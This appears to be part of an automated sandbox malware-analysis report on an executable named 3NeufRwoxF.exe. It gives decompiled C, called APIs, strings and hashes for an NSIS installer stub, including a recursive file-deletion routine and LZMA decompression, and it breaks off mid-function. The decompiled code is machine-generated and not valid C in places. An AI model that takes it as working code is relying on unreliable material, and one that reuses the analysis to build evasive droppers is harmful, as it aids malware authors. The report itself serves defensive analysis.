0x00403568
0x00403570
0x00403578
0x00403578
0x0040354c
0x00403538
0x00403534
0x0040357d
0x00403583
0x00403585
0x00403589
0x00403589
0x00403585
0x0040358e
0x00403593
0x00403596
0x00403598
0x00403598
0x004035a0
0x004035a0
0x0040342f
0x00403436
0x00403436
0x004033b2
0x00403401
0x00403401
0x0040340d
0x00000000
0x0040340d
0x004033bb
0x004033c8
0x004033bf
0x004033c5
0x00000000
0x00000000
0x004033c7
0x004033c7
0x004033c7
0x004033cc
0x004033ce
0x004033d6
0x00403442
0x00403456
0x00000000
0x00000000
0x0040345a
0x00403461
0x00403467
0x0040346d
0x00403475
0x00403475
0x00403483
0x0040348a
0x00403493
0x00403499
0x004034a5
0x004034ab
0x004034b5
0x004034c9
0x004034ca
0x004034cb
0x004034dc
0x004034e2
0x004034e9
0x004034ec
0x004034f2
0x004034f2
0x004034e9
0x004034f6
0x004034fc
0x004034fc
0x004034ff
0x00403500
0x00403501
0x00000000
0x00403501
0x004033d8
0x004033da
0x004033e5
0x00000000
0x00000000
0x004033ed
0x004033f8
0x004033fd
0x00000000
0x004033fd
0x00403379
0x00403385
0x0040338a
0x0040338f
0x00403391
0x00000000
0x00000000
0x00000000
0x00403391
0x00000000
0x0040332e
0x00000000
0x00000000
0x00000000
0x004032e2
0x004032e2
0x004032e2
0x004032e3
0x004032e3
0x00000000
0x004032e2
0x00000000

APIs

#17.COMCTL32 ref: 00403244
SetErrorMode.KERNELBASE(00008001), ref: 0040324F
OleInitialize.OLE32(00000000), ref: 00403256

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E

Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92

GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 00403293
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,00000000), ref: 004032A6
CharNextA.USER32(00000000,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,00000020), ref: 004032D1
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
DeleteFileA.KERNELBASE(1033), ref: 00403398
OleUninitialize.OLE32(00000000), ref: 00403416
ExitProcess.KERNEL32 ref: 00403436
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,00000000,00000000), ref: 00403442
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,00000000,00000000), ref: 0040344E
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
CopyFileA.KERNEL32 ref: 004034BF
CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
ExitProcess.KERNEL32 ref: 004035A0

Strings

/D=, xrefs: 00403327
C:\Users\user\AppData\Local\Temp\, xrefs: 00403359, 0040335E, 00403378, 00403384, 00403441, 0040344D, 00403459, 00403460, 00403500
~nsu.tmp, xrefs: 0040343C
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403235
", xrefs: 004032F3
Error launching installer, xrefs: 004033CE
SeShutdownPrivilege, xrefs: 00403553
_?=, xrefs: 004033BF
C:\Users\user\Desktop\3NeufRwoxF.exe, xrefs: 004034BA
\Temp, xrefs: 0040337F
NSIS Error, xrefs: 00403284
C:\Users\user\AppData\Local\Temp, xrefs: 004033F3
1033, xrefs: 00403393
C:\Users\user\AppData\Local\Temp, xrefs: 0040334F, 004033E8, 00403467, 00403470
NCRC, xrefs: 00403311
"C:\Users\user\Desktop\3NeufRwoxF.exe" , xrefs: 00403299, 0040329F, 004033B5
C:\Users\user\Desktop, xrefs: 00403447, 0040344C, 0040346F

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"$"C:\Users\user\Desktop\3NeufRwoxF.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\3NeufRwoxF.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2278157092-2565235550
Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E

Uniqueness

Uniqueness Score: -1.00%

Function 004053AA, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E00405659(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405A85(0x4214a0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004055BF(_t72);
					} else {
						lstrcatA(0x4214a0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405A85(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040573D(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E23(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404E23(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004057D3();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004053AA(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a0 - 0x5c;
					if( *0x4214a0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405D7C(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405578(_t72);
							E0040573D(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E23(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E23(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004057D3();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x004053b5
0x004053b9
0x004053c2
0x004053c5
0x004053c8
0x004053d0
0x004053d2
0x004053d3
0x00000000
0x004053d3
0x004053e2
0x004053e2
0x004053e5
0x004053e8
0x004053fc
0x00405403
0x00405408
0x0040540a
0x0040541a
0x0040540c
0x00405412
0x00405412
0x0040541f
0x00405422
0x0040542d
0x00405433
0x00405438
0x00405448
0x0040544a
0x00405450
0x00405453
0x00405456
0x00405513
0x00405513
0x00405517
0x00405519
0x00405519
0x00405519
0x00405519
0x00000000
0x00000000
0x00000000
0x00000000
0x0040545c
0x0040545c
0x00405465
0x0040546b
0x00405470
0x00405473
0x00405475
0x00405479
0x0040547b
0x0040547b
0x00405479
0x0040547e
0x00405481
0x00405494
0x00405496
0x0040549b
0x004054a2
0x004054ba
0x004054c0
0x004054c6
0x004054c8
0x004054ed
0x004054ca
0x004054ca
0x004054ce
0x004054e2
0x004054d0
0x004054d3
0x004054d8
0x004054da
0x004054db
0x004054db
0x004054ce
0x004054a4
0x004054aa
0x004054ac
0x004054b2
0x004054b2
0x004054ac
0x00000000
0x004054a2
0x00405483
0x00405486
0x00405488
0x00000000
0x00000000
0x0040548a
0x0040548c
0x00000000
0x00000000
0x0040548e
0x00405492
0x00000000
0x00000000
0x00000000
0x004054f2
0x004054fc
0x00405502
0x00405502
0x0040550d
0x00000000
0x0040550d
0x00405424
0x0040542b
0x00000000
0x00000000
0x00000000
0x004053ea
0x004053ea
0x004053ec
0x0040551d
0x00405520
0x00405523
0x00405575
0x00405575
0x00405575
0x00405525
0x00405528
0x00405533
0x00405538
0x0040553a
0x00000000
0x00000000
0x0040553d
0x00405543
0x00405549
0x0040554f
0x00405551
0x00000000
0x0040556d
0x00405553
0x00405557
0x00000000
0x00000000
0x0040555c
0x00405561
0x00405562
0x00000000
0x00405563
0x0040552a
0x0040552a
0x00000000
0x0040552a
0x004053f2
0x004053f6
0x00000000
0x00000000
0x00000000
0x004053f6

APIs

DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,73BCF560), ref: 004053C8
lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,73BCF560), ref: 00405412
lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,73BCF560), ref: 00405433
lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,73BCF560), ref: 00405439
FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\3NeufRwoxF.exe" ,73BCF560), ref: 0040544A
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
FindClose.KERNEL32(?), ref: 0040550D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
\*.*, xrefs: 0040540C
"C:\Users\user\Desktop\3NeufRwoxF.exe" , xrefs: 004053B4

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\3NeufRwoxF.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3485177279
Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040604C, Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0040604C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
